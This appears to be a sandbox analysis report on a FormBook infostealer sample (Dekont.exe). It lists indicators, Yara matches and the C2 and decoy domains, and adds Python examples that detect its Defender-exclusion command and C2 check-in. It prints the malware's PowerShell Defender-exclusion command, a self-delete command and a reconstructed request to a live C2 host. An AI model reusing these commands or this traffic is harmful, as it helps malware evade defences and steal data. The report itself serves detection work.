
Windows Analysis Report
Dekont.exe

Overview

General Information

Sample name: Dekont.exe
Analysis ID: 1517901
MD5: da966801158ea63939a23e310275241a
SHA1: ef1f98cd080aca6cbf0b1ea8b08e7ab492435ae8
SHA256: 883b2afba671ff4851527b315260a4415a111c013811fec1822dcae4076628e5
Tags: exe, geo, TUR, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Dekont.exe (PID: 1816 cmdline: "C:\Users\user\Desktop\Dekont.exe" MD5: DA966801158EA63939A23E310275241A)
    • powershell.exe (PID: 3500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 528 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Dekont.exe (PID: 5624 cmdline: "C:\Users\user\Desktop\Dekont.exe" MD5: DA966801158EA63939A23E310275241A)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • control.exe (PID: 1292 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • cmd.exe (PID: 432 cmdline: /c del "C:\Users\user\Desktop\Dekont.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Extracted malware configuration (FormBook): {"C2 list": ["www.avada-casino-tlj.buzz/bc01/"], "decoy": ["epatitis-treatment-26155.bond", "52cy67sk.bond", "nline-degree-6987776.world", "ingxingdiandeng-2033.top", "mberbreeze.cyou", "48xc300mw.autos", "obs-for-seniors-39582.bond", "tpetersburg-3-tonn.online", "egafon-parser.online", "172jh.shop", "ltraman.pro", "bqfhnys.shop", "ntercash24-cad.homes", "uhtwister.cloud", "alk-in-tubs-27353.bond", "ucas-saaad.buzz", "oko.events", "8080713.xyz", "refabricated-homes-74404.bond", "inaa.boo", "nnevateknoloji.xyz", "ar-accident-lawyer-389.today", "ianju-fvqh092.vip", "ealthandwellnessly.digital", "qzxx.top", "q8189.top", "ecurity-service-22477.bond", "ractors-42621.bond", "astamadre.shop", "tonomushotel.xyz", "cowatt.fun", "olocaustaffirmer.net", "delphi.ltd", "mmwinni.buzz", "8009.top", "nline-gaming-ox-fr.xyz", "irtyeffingrancher.info", "omotech-dz.net", "akemoneyonline.bond", "ustbookin.online", "eals.lat", "irmag.online", "eddogbrands.website", "oifulcares.net", "aming-chair-83359.bond", "ewferg.top", "areless.net", "torygame168.online", "y-language-menu.net", "iring-cleaners-2507.xyz", "inancialenlightment.info", "ar-accident-lawyer-389.today", "sicologosportugueses.online", "ajabandot.website", "oidakings.net", "2ar1.shop", "comedia.lol", "kjbrosmm.shop", "ffpage.shop", "nfluencer-marketing-17923.bond", "ebshieldsrenew.live", "lkjuy.xyz", "lussalesapp.website", "hildrens-clothing.today"]}
Yara matches in memory dumps (Source | Rule | Description | Author | Strings)

00000005.00000002.2142589404.0000000000EDF000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x2b9:$a1: E9 92 9D FF FF C3 E8
00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
(31 further memory-dump matches not shown in this view)

Yara matches in unpacked PE files (Source | Rule | Description | Author | Strings)

5.2.Dekont.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.Dekont.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.Dekont.exe.400000.0.raw.unpack | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x1f2b9:$a1: E9 92 9D FF FF C3 E8
5.2.Dekont.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.Dekont.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 further unpacked-PE matches not shown in this view)

          System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Dekont.exe", ParentImage: C:\Users\user\Desktop\Dekont.exe, ParentProcessId: 1816, ParentProcessName: Dekont.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", ProcessId: 3500, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Dekont.exe", ParentImage: C:\Users\user\Desktop\Dekont.exe, ParentProcessId: 1816, ParentProcessName: Dekont.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", ProcessId: 3500, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Dekont.exe", ParentImage: C:\Users\user\Desktop\Dekont.exe, ParentProcessId: 1816, ParentProcessName: Dekont.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe", ProcessId: 3500, ProcessName: powershell.exe
Suricata alert (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)
2024-09-25T09:00:23.908530+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49715 | 185.26.122.70 | 80 | TCP
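The three Sigma hits above fire on the clear-text `Add-MpPreference -ExclusionPath` command line spawned by Dekont.exe; the `base64offset` rule also covers the case where the cmdlet is hidden inside an `-EncodedCommand` blob. The following Python is an added example, not part of this report and not the Sigma project's rule code. It approximates that detection logic over constructed process-creation events (PID 3500 mirrors the command line in the process tree, the other two events are hypothetical) and shows how the three base64 alignments of a needle are derived so that the match works wherever the cmdlet sits in the decoded script.

```python
"""Detect Defender-exclusion tampering from PowerShell process-creation events.
Added example: approximates the idea behind the Sigma hits above (clear-text
Add-/Set-MpPreference with an -Exclusion* parameter, and the cmdlet hidden in
base64); it is not the Sigma project's rule code."""
import base64

CMDLETS = ("Add-MpPreference", "Set-MpPreference")
EXCLUSION_PARAMS = ("-ExclusionPath", "-ExclusionExtension",
                    "-ExclusionProcess", "-ExclusionIpAddress")


def encoded_command(script: str) -> str:
    """Encode a script the way PowerShell -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def base64offset_variants(needle: str, encoding: str = "utf-8") -> list[str]:
    """Return the three base64 substrings that reveal `needle` wherever it sits in
    the decoded text (0, 1 or 2 bytes past a 3-byte boundary). Leading characters
    that mix in the preceding bytes and trailing characters that mix in the
    following bytes are trimmed, so each variant depends on `needle` alone."""
    raw = needle.encode(encoding)
    starts = (0, 2, 3)      # indexed by the shift
    ends = (None, -3, -2)   # indexed by (len(raw) + shift) % 3
    variants = []
    for shift in range(3):
        enc = base64.b64encode(b" " * shift + raw).decode("ascii")
        variants.append(enc[starts[shift]:ends[(len(raw) + shift) % 3]])
    return variants


def matches_mppreference_exclusion(cmdline: str) -> bool:
    """True when the command line adds or changes a Defender exclusion, either in
    clear text or as base64 (UTF-16LE -EncodedCommand or a plain UTF-8 blob).
    Caveat: base64 is case-sensitive, so an encoded 'add-mppreference' written in
    another case needs its own set of variants."""
    low = cmdline.lower()
    if any(c.lower() in low for c in CMDLETS) and any(p.lower() in low for p in EXCLUSION_PARAMS):
        return True
    for cmdlet in CMDLETS:
        for enc in ("utf-16le", "utf-8"):
            if any(v in cmdline for v in base64offset_variants(cmdlet, enc)):
                return True
    return False


# Constructed sample events shaped like Sysmon EID 1 / Security 4688 records
# (not the report's raw logs). PID 3500 mirrors the command line in the process
# tree above; the other two are hypothetical.
SAMPLE_EVENTS = [
    {"ProcessId": 3500, "ParentImage": r"C:\Users\user\Desktop\Dekont.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"'},
    {"ProcessId": 4101, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoP -EncodedCommand "
                    + encoded_command(r'$p="C:\Users\user\AppData\Local\Temp";Add-MpPreference -ExclusionPath $p')},
    {"ProcessId": 4102, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-MpPreference | Select-Object ExclusionPath"},
]


def scan_events(events) -> list[int]:
    """Return the ProcessIds whose command line tampers with Defender exclusions."""
    return [e["ProcessId"] for e in events if matches_mppreference_exclusion(e["CommandLine"])]


if __name__ == "__main__":
    for pid in scan_events(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: Defender exclusion added or changed from PowerShell")
```

The trimming table is the point of the exercise: a needle that starts one byte past a 3-byte boundary shares its first two base64 characters with whatever precedes it, and a needle whose length leaves one or two bytes in the last group shares its final characters with whatever follows, so only the middle is a reliable substring. Pair this with the Defender operational log (event 5007 records the exclusion change itself) so that the alert does not depend solely on the command line being visible.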


          AV Detection

Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy list as given in the extracted configuration under Classification above)
Source: Dekont.exe | ReversingLabs: Detection: 57%
Source: Yara match | File source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Dekont.exe | Joe Sandbox ML: detected
Source: Dekont.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Dekont.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: GHQc.pdb source: explorer.exe, 00000006.00000002.4539578368.0000000010ACF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4520058887.000000000525F000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4518750367.00000000049A0000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe
          Source: Binary string: wntdll.pdbUGP source: Dekont.exe, 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2146384176.0000000004B5F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2143082654.00000000049AD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe, 00000005.00000002.2145040101.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: GHQc.pdbSHA256 source: explorer.exe, 00000006.00000002.4539578368.0000000010ACF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4520058887.000000000525F000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4518750367.00000000049A0000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe
          Source: Binary string: wntdll.pdb source: Dekont.exe, Dekont.exe, 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2146384176.0000000004B5F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2143082654.00000000049AD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe, 00000005.00000002.2145040101.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Dekont.exe | Code function: 4x nop then pop edi | 5_2_0040E461
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi | 8_2_02B3E461

          Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49715 -> 185.26.122.70:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49715 -> 185.26.122.70:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49715 -> 185.26.122.70:80
Source: Malware configuration extractor | URLs: www.avada-casino-tlj.buzz/bc01/
Source: DNS query: www.nnevateknoloji.xyz
Source: unknown | DNS traffic detected: query: www.omotech-dz.net, reply code: Name error (3, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.ar-accident-lawyer-389.today, reply code: Name error (3, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.ebshieldsrenew.live, reply code: Name error (3, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.inancialenlightment.info, reply code: Name error (3, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.nnevateknoloji.xyz, reply code: Name error (3, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.eals.lat, reply code: Name error (3, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.eddogbrands.website, reply code: Name error (3, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.hildrens-clothing.today, reply code: Name error (3, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.olocaustaffirmer.net, reply code: Name error (3, NXDOMAIN)
Source: unknown | DNS traffic detected: query: www.y-language-menu.net, reply code: Name error (3, NXDOMAIN)
Source: global traffic | HTTP traffic detected: GET /bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0 HTTP/1.1 | Host: www.oko.events | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, nothing printable)
Source: Joe Sandbox View | ASN Name: HOSTLANDRU
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: C:\Windows\explorer.exe | Code function: getaddrinfo, setsockopt, recv | 6_2_0E750F82
Source: global traffic | DNS traffic detected: DNS query: www.ar-accident-lawyer-389.today
Source: global traffic | DNS traffic detected: DNS query: www.nnevateknoloji.xyz
Source: global traffic | DNS traffic detected: DNS query: www.eddogbrands.website
Source: global traffic | DNS traffic detected: DNS query: www.inancialenlightment.info
Source: global traffic | DNS traffic detected: DNS query: www.omotech-dz.net
Source: global traffic | DNS traffic detected: DNS query: www.y-language-menu.net
Source: global traffic | DNS traffic detected: DNS query: www.ebshieldsrenew.live
Source: global traffic | DNS traffic detected: DNS query: www.oko.events
Source: global traffic | DNS traffic detected: DNS query: www.hildrens-clothing.today
Source: global traffic | DNS traffic detected: DNS query: www.olocaustaffirmer.net
Source: global traffic | DNS traffic detected: DNS query: www.eals.lat
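The GET shown in this section carries the traits the signature list flags: no User-Agent header, `Connection: close`, a short `/bc01/` path with two opaque query parameters, a Host taken from the decoy list, and seven NUL bytes of trailing data. The following Python is an added example, not code from the report or from Joe Sandbox: it reconstructs that request with CRLF framing (the framing and the benign comparison request are constructed here), parses it without letting a URL library rewrite the `+` inside the encrypted values, and scores those traits. `KNOWN_HOSTS` is a hand-picked subset of the extracted configuration, and the threshold is an assumption.

```python
"""Parse and score the captured FormBook check-in request. Added example; the
request bytes are reconstructed from the report's GET line and headers with CRLF
framing, and the benign request is constructed for comparison."""
import re

FORMBOOK_CHECKIN = (
    b"GET /bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6"
    b"&2dptmT=8paLMJPH3rxHgFq0 HTTP/1.1\r\n"
    b"Host: www.oko.events\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"   # the seven NUL bytes the report shows as Data Raw
)

BENIGN_GET = (  # hypothetical browser request, for contrast
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)

# Hand-picked subset of the hosts in the extracted configuration, with the
# 'www.' label the malware adds when it queries them (assumption: a full
# deployment would load the whole list from the config).
KNOWN_HOSTS = {"www.avada-casino-tlj.buzz", "www.oko.events", "www.ebshieldsrenew.live"}

# FormBook-style path: a short alphanumeric tag between slashes, e.g. /bc01/.
SHORT_TAG_PATH = re.compile(r"^/[A-Za-z0-9]{2,6}/$")


def parse_request(raw: bytes) -> dict:
    """Split an HTTP/1.1 request into method, path, query, headers and body.
    The query is split by hand so that '+' and '%xx' in the encrypted values are
    kept exactly as sent (urllib.parse.parse_qsl would turn '+' into a space)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    params = {}
    for pair in (query.split("&") if query else []):
        key, _, value = pair.partition("=")
        params[key] = value
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "version": version, "path": path,
            "query": params, "headers": headers, "body": body}


def score_checkin(req: dict) -> dict:
    """Score the traits the report's signatures single out; each True adds one."""
    h = req["headers"]
    traits = {
        "no_user_agent": "user-agent" not in h,
        "connection_close": h.get("connection", "").lower() == "close",
        "short_tag_path": bool(SHORT_TAG_PATH.match(req["path"])),
        "two_opaque_params": len(req["query"]) == 2,
        "host_in_config": h.get("host", "") in KNOWN_HOSTS,
        "nul_trailer": bool(req["body"]) and not req["body"].strip(b"\x00"),
    }
    traits["score"] = sum(1 for v in traits.values() if v)
    return traits


def is_formbook_checkin(raw: bytes, threshold: int = 4) -> bool:
    """Verdict helper; the threshold of 4 out of 6 traits is an assumption."""
    return score_checkin(parse_request(raw))["score"] >= threshold


if __name__ == "__main__":
    for name, raw in (("report GET", FORMBOOK_CHECKIN), ("benign GET", BENIGN_GET)):
        print(name, score_checkin(parse_request(raw)))
```

The query values are encrypted by the malware and are deliberately not decoded; the scoring works on the shape of the request alone, which is also what the ET MALWARE "FormBook CnC Checkin (GET)" alerts above key on. The `host_in_config` trait is the only one that needs per-sample data, so the other five are the portable part of the detection.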
Source: explorer.exe, 00000006.00000002.4530151836.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000006.00000002.4517983808.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2077619011.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: explorer.exe, 00000006.00000002.4530151836.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000002.4530151836.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000006.00000002.4530151836.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000002.4527294039.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4527411989.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2087941103.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: Dekont.exe, 00000000.00000002.2068088003.0000000002972000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory:
  • http://www.48xc300mw.autos
  • http://www.48xc300mw.autos/bc01/
  • http://www.48xc300mw.autos/bc01/www.avada-casino-tlj.buzz
  • http://www.48xc300mw.autosReferer:
  • http://www.ar-accident-lawyer-389.today
  • http://www.ar-accident-lawyer-389.today/bc01/
  • http://www.ar-accident-lawyer-389.today/bc01/www.nnevateknoloji.xyz
  • http://www.ar-accident-lawyer-389.todayReferer:
